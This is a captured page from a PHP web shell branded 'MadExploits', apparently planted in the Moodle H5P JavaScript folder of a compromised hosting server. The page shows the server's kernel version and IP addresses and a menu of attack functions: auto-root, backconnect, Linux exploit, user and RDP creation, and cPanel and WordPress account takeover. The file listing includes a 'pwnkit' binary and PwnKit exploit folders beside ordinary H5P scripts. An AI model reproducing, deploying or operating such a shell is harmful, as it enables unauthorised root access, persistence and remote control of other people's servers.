Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.175.37
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
hvp /
library /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
h5p-action-bar.js
2.66
KB
-rw-r--r--
h5p-confirmation-dialog.js
11.86
KB
-rw-r--r--
h5p-content-type.js
1.26
KB
-rw-r--r--
h5p-content-upgrade-process.js
9.35
KB
-rw-r--r--
h5p-content-upgrade-worker.js
1.47
KB
-rw-r--r--
h5p-content-upgrade.js
11.29
KB
-rw-r--r--
h5p-data-view.js
11.95
KB
-rw-r--r--
h5p-display-options.js
1.28
KB
-rw-r--r--
h5p-embed.js
1.93
KB
-rw-r--r--
h5p-event-dispatcher.js
6.29
KB
-rw-r--r--
h5p-hub-registration.js
161.72
KB
-rw-r--r--
h5p-hub-sharing.js
235.33
KB
-rw-r--r--
h5p-library-details.js
10.7
KB
-rw-r--r--
h5p-library-list.js
4.22
KB
-rw-r--r--
h5p-resizer.js
3.57
KB
-rw-r--r--
h5p-utils.js
12.51
KB
-rw-r--r--
h5p-version.js
926
B
-rw-r--r--
h5p-x-api-event.js
8.55
KB
-rw-r--r--
h5p-x-api.js
3.64
KB
-rw-r--r--
h5p.js
85.76
KB
-rw-r--r--
jquery.js
88.08
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
request-queue.js
11.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : h5p-action-bar.js
/** * @class * @augments H5P.EventDispatcher * @param {Object} displayOptions * @param {boolean} displayOptions.export Triggers the display of the 'Download' button * @param {boolean} displayOptions.copyright Triggers the display of the 'Copyright' button * @param {boolean} displayOptions.embed Triggers the display of the 'Embed' button * @param {boolean} displayOptions.icon Triggers the display of the 'H5P icon' link */ H5P.ActionBar = (function ($, EventDispatcher) { "use strict"; function ActionBar(displayOptions) { EventDispatcher.call(this); /** @alias H5P.ActionBar# */ var self = this; var hasActions = false; // Create action bar var $actions = H5P.jQuery('<ul class="h5p-actions"></ul>'); /** * Helper for creating action bar buttons. * * @private * @param {string} type * @param {string} customClass Instead of type class */ var addActionButton = function (type, customClass) { /** * Handles selection of action */ var handler = function () { self.trigger(type); }; H5P.jQuery('<li/>', { 'class': 'h5p-button h5p-noselect h5p-' + (customClass ? customClass : type), role: 'button', tabindex: 0, title: H5P.t(type + 'Description'), html: H5P.t(type), on: { click: handler, keypress: function (e) { if (e.which === 32) { handler(); e.preventDefault(); // (since return false will block other inputs) } } }, appendTo: $actions }); hasActions = true; }; // Register action bar buttons if (displayOptions.export || displayOptions.copy) { // Add export button addActionButton('reuse', 'export'); } if (displayOptions.copyright) { addActionButton('copyrights'); } if (displayOptions.embed) { addActionButton('embed'); } if (displayOptions.icon) { // Add about H5P button icon H5P.jQuery('<li><a class="h5p-link" href="http://h5p.org" target="_blank" title="' + H5P.t('h5pDescription') + '"></a></li>').appendTo($actions); hasActions = true; } /** * Returns a reference to the dom element * * @return {H5P.jQuery} */ self.getDOMElement = function () { return $actions; }; /** * Does the actionbar contain actions? * * @return {Boolean} */ self.hasActions = function () { return hasActions; }; } ActionBar.prototype = Object.create(EventDispatcher.prototype); ActionBar.prototype.constructor = ActionBar; return ActionBar; })(H5P.jQuery, H5P.EventDispatcher);
Close